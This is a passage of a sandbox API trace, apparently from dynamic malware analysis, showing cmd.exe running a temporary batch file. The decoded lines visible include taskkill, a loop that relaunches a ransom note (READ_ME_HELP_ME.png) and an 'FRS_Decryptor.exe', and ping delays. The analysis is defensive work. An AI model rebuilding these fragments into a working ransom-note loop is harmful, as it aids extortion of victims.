lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0138.496] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.496] GetFileType (hFile=0x2b8) returned 0x1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0138.496] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0138.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0138.496] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0138.497] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.497] GetFileType (hFile=0x2b8) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0138.497] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0138.497] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0138.497] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.497] GetFileType (hFile=0x2b8) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0138.497] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0138.497] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0138.497] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.497] GetFileType (hFile=0x2b8) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0138.497] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0138.497] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0138.497] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.497] GetFileType (hFile=0x2b8) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0138.497] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0138.497] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0138.497] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.497] GetFileType (hFile=0x2b8) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0138.498] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0138.498] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0138.498] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0138.498] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0138.498] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.498] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0138.498] _get_osfhandle (_FileHandle=0) returned 0x24 [0138.498] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0138.501] SetConsoleInputExeNameW () returned 0x1 [0138.501] GetConsoleOutputCP () returned 0x1b5 [0138.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0138.501] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.501] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0138.501] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0138.501] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.501] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0138.501] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0138.501] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0138.501] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0138.501] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0138.501] GetFileType (hFile=0x2b8) returned 0x1 [0138.501] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.501] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0138.501] _tell (_FileHandle=3) returned 2512 [0138.501] _close (_FileHandle=3) returned 0 [0138.502] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0138.502] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0138.502] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0138.502] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0138.502] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0138.502] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0138.502] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0138.502] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0138.502] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0138.502] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0138.502] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0138.502] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0138.502] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0138.502] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0138.502] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0138.502] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0138.502] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0138.502] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0138.502] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0138.502] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0138.502] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0138.502] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0138.502] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0138.502] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0138.502] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0138.502] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0138.502] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0138.502] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0138.502] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0138.502] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0138.502] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0138.502] _wcsicmp (_String1="ping", _String2="START") returned -3 [0138.502] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0138.502] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0138.502] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0138.502] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0138.502] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0138.502] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0138.502] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0138.502] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0138.502] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0138.502] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0138.502] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0138.502] SetErrorMode (uMode=0x0) returned 0x0 [0138.502] SetErrorMode (uMode=0x1) returned 0x0 [0138.502] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0138.502] SetErrorMode (uMode=0x0) returned 0x1 [0138.502] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.502] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.503] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.503] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0138.503] GetLastError () returned 0x2 [0138.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0138.503] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0138.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0138.503] GetLastError () returned 0x2 [0138.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a1f0 [0138.503] FindClose (in: hFindFile=0xd5a1f0 | out: hFindFile=0xd5a1f0) returned 1 [0138.503] GetFileType (hFile=0x28) returned 0x2 [0138.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0138.503] _dup (_FileHandle=1) returned 3 [0138.503] _close (_FileHandle=1) returned 0 [0138.503] _wcsicmp (_String1="nul", _String2="con") returned 11 [0138.503] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0138.504] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0138.504] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0138.504] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0138.504] SetErrorMode (uMode=0x0) returned 0x0 [0138.504] SetErrorMode (uMode=0x1) returned 0x0 [0138.504] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0138.504] SetErrorMode (uMode=0x0) returned 0x1 [0138.504] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.504] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0138.504] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.504] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.504] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0138.504] GetLastError () returned 0x2 [0138.504] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0f0 [0138.504] FindClose (in: hFindFile=0xd5a0f0 | out: hFindFile=0xd5a0f0) returned 1 [0138.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0138.504] GetLastError () returned 0x2 [0138.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a170 [0138.505] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0138.505] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0138.505] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0138.505] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0138.505] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0138.505] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0138.506] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0138.506] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0138.506] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x260, dwProcessId=0x8fc, dwThreadId=0x8ac)) returned 1 [0138.509] CloseHandle (hObject=0x260) returned 1 [0138.509] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.509] GetEnvironmentStringsW () returned 0xd7e510* [0138.509] FreeEnvironmentStringsA (penv="=") returned 1 [0138.509] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0140.568] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0140.569] CloseHandle (hObject=0x2b0) returned 1 [0140.569] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0140.569] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0140.569] GetEnvironmentStringsW () returned 0xd30508* [0140.569] FreeEnvironmentStringsA (penv="=") returned 1 [0140.569] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0140.569] GetEnvironmentStringsW () returned 0xd7e510* [0140.569] FreeEnvironmentStringsA (penv="=") returned 1 [0140.569] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0140.569] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.569] _close (_FileHandle=3) returned 0 [0140.569] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.569] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0140.570] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.570] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0140.570] _get_osfhandle (_FileHandle=0) returned 0x24 [0140.570] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0140.570] SetConsoleInputExeNameW () returned 0x1 [0140.570] GetConsoleOutputCP () returned 0x1b5 [0140.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0140.570] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.570] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0140.571] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0140.571] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0140.571] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0140.571] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0140.571] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0140.571] SetFilePointer 